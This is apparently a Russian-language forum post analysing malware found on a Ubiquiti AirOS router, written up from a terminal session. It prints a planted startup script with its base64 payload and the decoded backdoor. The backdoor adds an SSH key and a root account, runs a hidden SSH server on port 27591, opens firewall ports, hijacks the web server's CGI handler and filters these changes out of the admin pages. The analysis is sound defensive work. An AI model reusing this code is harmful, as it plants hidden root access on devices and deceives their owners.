ubnt@xxx.xxx.xxx.xxx's password:
BusyBox v1.11.2 (2013-05-28 17:52:06 EEST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
XM.v5.5.6# ls -lA
-rw------- 1 ubnt admin 459 Apr 6 2012 dropbear_dss_host_key
-rw------- 1 ubnt admin 427 Apr 6 2012 dropbear_rsa_host_key
-rw------- 1 ubnt admin 20055 Dec 14 03:02 mf.tar
-rwxr-xr-x 1 ubnt admin 1857 Dec 13 00:59 rc.prestart
XM.v5.5.6#
XM.v5.5.6#
XM.v5.5.6#
XM.v5.5.6#
XM.v5.5.6# cat rc.prestart
#!/bin/sh
mkdir -p /var/bin
cat << EOFEOFEOF | uudecode -o /var/bin/cgi -
begin-base64 755 -
IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl
bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz
YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t
ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM
ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1
R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH
QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z
a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w
Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv
cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp
clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0
Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r
ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl
bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt
YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k
ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg
LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF
UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv
cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn
c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp
Jwo=
====
EOFEOFEOF
chmod 755 /var/bin/cgi 2>/dev/null
sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf
sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf
-------------------------
Попробуем заглянуть внутрь...
XM.v5.5.6# cat << EOFEOFEOF | uudecode -o /tmp/cgi -
> begin-base64 755 -
> IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl
> bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz
> YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t
> ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM
> ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1
> R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH
> QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z
> a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w
> Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv
> cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp
> clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0
> Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r
> ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl
> bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt
> YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k
> ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg
> LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF
> UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv
> cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn
> c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp
> Jwo=
> ====
> EOFEOFEOF
XM.v5.5.6# ls -l /tmp/cgi
-rwxr-xr-x 1 ubnt admin 1142 Dec 17 03:33 /tmp/cgi
XM.v5.5.6# cat /tmp/cgi
#!/bin/sh
if [ "$HTTP_HOST" = "localhost.localnet" ]; then
PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys
echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd
if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then
dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1
fi
dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
iptables -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -I INPUT -p tcp --dport 27591 -j ACCEPT
fi
grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)'
XM.v5.5.6# netstat -nl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN
tcp 0 0 :::80 :::* LISTEN
tcp 0 0 :::53 :::* LISTEN
tcp 0 0 :::22 :::* LISTEN
--------------
Однако не активен бэкдор...
Тот который dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null
Ибо if [ "$HTTP_HOST" = "localhost.localnet" ]; then
Хм...
Странный вирус...
Или то не вирус?
Походу активируется отсюда
sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf
sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf
Ну, собственно
cgi.assign = (
"/ipscan.cgi" => "",
"/signal.cgi" => "",
"/status.cgi" => "",
"/glogo.cgi" => "",
"/status-new.cgi" => "",
"/ifstats.cgi" => "",
"/iflist.cgi" => "",
"/air-view.cgi" => "",
".jnlp" => "/var/bin/cgi",
".cgi" => "/var/bin/cgi",
".sh" => "/bin/sh"
)
host:~ # wget http://xxx.xxx.xxx.xxx/.cgi
--2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/.cgi
Connecting to xxx.xxx.xxx.xxx:80... connected.
HTTP request sent, awaiting response... 302 Found
Location: /cookiechecker?uri=/.cgi [following]
--2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/cookiechecker?uri=/.cgi
Reusing existing connection to xxx.xxx.xxx.xxx:80.
HTTP request sent, awaiting response... 302 Found
Location: /.cgi [following]
--2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/.cgi
Reusing existing connection to xxx.xxx.xxx.xxx:80.
HTTP request sent, awaiting response... 302 Found
Location: /login.cgi?uri=/.cgi [following]
--2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/login.cgi?uri=/.cgi
Reusing existing connection to xxx.xxx.xxx.xxx:80.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘.cgi’
.cgi [ <=> ] 2.85K --.-KB/s in 0.001s
2016-05-22 22:13:40 (1.92 MB/s) - ‘.cgi’ saved [2916]
resolv:~ # cat .cgi
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Login</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Cache-Control" content="no-cache">
<link rel="shortcut icon" href="/130528.1754/favicon.ico" >
<link href="/130528.1754/login.css" rel="stylesheet" type="text/css">
<link href="/130528.1754/style.css" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/130528.1754/js/jquery.js"></script>
<script type="text/javascript" src="/130528.1754/util.js"></script>
<script type="text/javascript" src="/130528.1754/index.js"></script>
<script type="text/javascript" language="javascript">
//<!--
var globals = {
first_login : false,
postback : false,
fixed : false,
country : ""
};
function onLangChange() {
$("#lang_changed").val("yes");
$("#loginform").submit();
}
function validateForm() {
if ($("#lang_changed").val() == "yes")
return true;
if ($("#country").val() == "0") {
$("#errmsg").text("Please select your country.");
return false;
}
if (!$("#agreed").is(":checked")) {
$("#errmsg").html("To use this product, you must agree to<br/>terms of use.");
return false;
}
return true;
}
$(document).ready(function() {
$("#username").focus();
cache_images([
'main_top.png', 'main.png', 'link.png',
'net.png', '4dv.png', 'srv.png',
'system.png', 'border.gif', 'spectr.gif']);
if (globals.first_login) {
$("#ui_language").change(onLangChange);
$("#loginform").submit(validateForm);
if (!globals.postback && !globals.fixed)
$("#country").val(0);
else
$("#country").val(globals.country);
}
});
//-->
</script>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" align="center" class="loginsubtable">
<form enctype="multipart/form-data" id="loginform" method="post" action="/login.cgi">
<tr>
<td valign="top"><img src="/130528.1754/images/airos_logo.png"></td>
<td class="loginsep">
<input type="hidden" name="uri" id="uri" value="/.cgi" />
<table border="0" cellpadding="0" cellspacing="0" class="logintable" align="center">
<tr>
<td colspan="2" align="center">
<div id="errmsg" class="error">
</div>
</td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
<tr>
<td><label for="username">Username:</label></td>
<td><input type="text" name="username" id="username" /></td>
</tr>
<tr>
<td><label for="password">Password:</label></td>
<td><input type="password" name="password" id="password" maxlength="8"/></td>
</tr>
<tr>
<td colspan="2"> </td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
</td>
<td class="submit" align="right">
<input type="submit" value="Login" />
</td>
</tr>
</form>
</table>
</body>
</html>
Т.е. запаролено...
Без пароля бэкдор не запустить...